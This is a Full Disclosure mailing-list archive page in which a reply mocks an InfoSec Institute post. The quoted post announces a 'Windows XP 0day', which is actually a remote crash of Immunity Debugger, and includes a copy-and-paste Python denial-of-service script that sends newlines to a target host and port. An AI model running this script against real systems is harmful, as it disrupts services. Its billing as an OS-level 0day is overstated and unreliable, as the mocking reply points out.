Full Disclosure mailing list archives

Re: Windows XP denial of service 0day found in CTF exercise

From: Memory Vandal <memvandal () gmail com>
Date: Tue, 17 Apr 2012 13:12:44 +0530

Windows XP 0day? LOL. seems InfoSec Institute is going crazy day by day.

and who exploits remote DDoS on 127.0.0.1 and takes screenshot?! lol

MemoryVandal


On Tue, Apr 17, 2012 at 12:18 PM, Adam Behnke <adam () infosecinstitute com>wrote:

Immunity Debugger Remote Denial of Service 0Day
Tested against version 1.76 and 1.80 on Windows XP distributions

Has not been tested for potential privilege escalation vectors.

We first wrote about Immunity Debugger here:
http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/

Discovered by a student that wishes to remain anonymous in the course CTF.
This 0day exploit for Windows was discovered by a student in the InfoSec
Institute Ethical Hacking class, during an evening CTF exercise. The
student wishes to remain anonymous, he has contributed a python version of
the 0day. A patch that can be applied to Windows has not been made
available. You can find a python version of the exploit to copy and paste
here:


#!/usr/bin/python
#Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec
Institute student
#For full write up and description go to
http://www.infosecinstitute.com/courses/ethical_hacking_training.html
import sys
import os
import time
import getopt
import socket

class Error(Exception):
       def __init__(self, error):
               self.errorStr=error

       def __str__(self):
               return repr(self.errorStr)

class Exploit():

       def __init__(self, targetHost, targetPort):
               self.targetHost = targetHost

       def exploit(self, targetHost, targetPort):

               try:
                       socket.inet_aton(targetHost)
                       s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                       s.connect((targetHost,targetPort))
               except socket.error:
                       raise Error("Unable to exploit (Connect failed.)")
                       sys.exit(0)

               # exploit
               try:
                       s.sendto("\n\n\n", (targetHost, targetPort))
               except:
                       raise Error("Unable to exploit (Exploit failed.)")


def usage():
       print "[!] Usage:"
       print " ( -h, --help ):"
       print "         Print this message."
       print " ( --targetHost= ): Target host."
       print "         --targetHost=127.0.0.1"
       print " ( --targetPort= ): Target port."
       print "         --targetPort=8888"

def main():
       print "[$] Windows XP 0Day"
       try:
               opts, args = getopt.getopt(sys.argv[1:], "h", ["help",
"targetHost=", "targetPort="])
       except getopt.GetoptError, err:
               # Print help information and exit:
               print '[!] Parameter error:' + str(err) # Will print
something like "option -a not recognized"
               usage()
               sys.exit(0)

       targetHost=None
       targetPort=None

       for opt, arg in opts:
               if opt in ("-h", "--help"):
                       usage()
                       sys.exit(0)
               elif opt =="--targetHost":
                       targetHost=arg
               elif opt =="--targetPort":
                       targetPort=arg
               else:
                       # I would be assuming to say we'll never get here.
                       print "[!] Parameter error."
                       usage()
                       sys.exit(0)

       if not targetHost:
               print "[!] Parameter error: targetHost not set."
               usage()
               sys.exit(0)

       if not targetPort:
               print "[!] Parameter error: targetPort not set."
               usage()
               sys.exit(0)

       exploit = Exploit(targetHost, targetPort)

       print "[*] Attempting to exploit:"

       try:
               exploit.exploit(targetHost, int(targetPort))
       except Error as error:
               print "[!] Exploit Error: %s" % (error.errorStr)
               exit(0)
       print "[*] Exploit appears to have worked."

# Standard boilerplate to call the main() function to begin
# the program.
if __name__=='__main__':
       main()
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Windows XP denial of service 0day found in CTF exercise Adam Behnke (Apr 16)
- Re: Windows XP denial of service 0day found in CTF exercise Memory Vandal (Apr 17)
  - Re: Windows XP denial of service 0day found in CTF exercise Romain Bourdy (Apr 17)
    - Re: Windows XP denial of service 0day found in CTF exercise Memory Vandal (Apr 17)
    - Re: Windows XP denial of service 0day found in CTF exercise Mihamina Rakotomandimby (Apr 17)
- Re: Windows XP denial of service 0day found in CTF exercise Justin C. Klein Keane (Apr 17)
- Message not available
  - Re: Windows XP denial of service 0day found in CTF exercise adam (Apr 17)
    - Re: Windows XP denial of service 0day found in CTF exercise Terrence (Apr 17)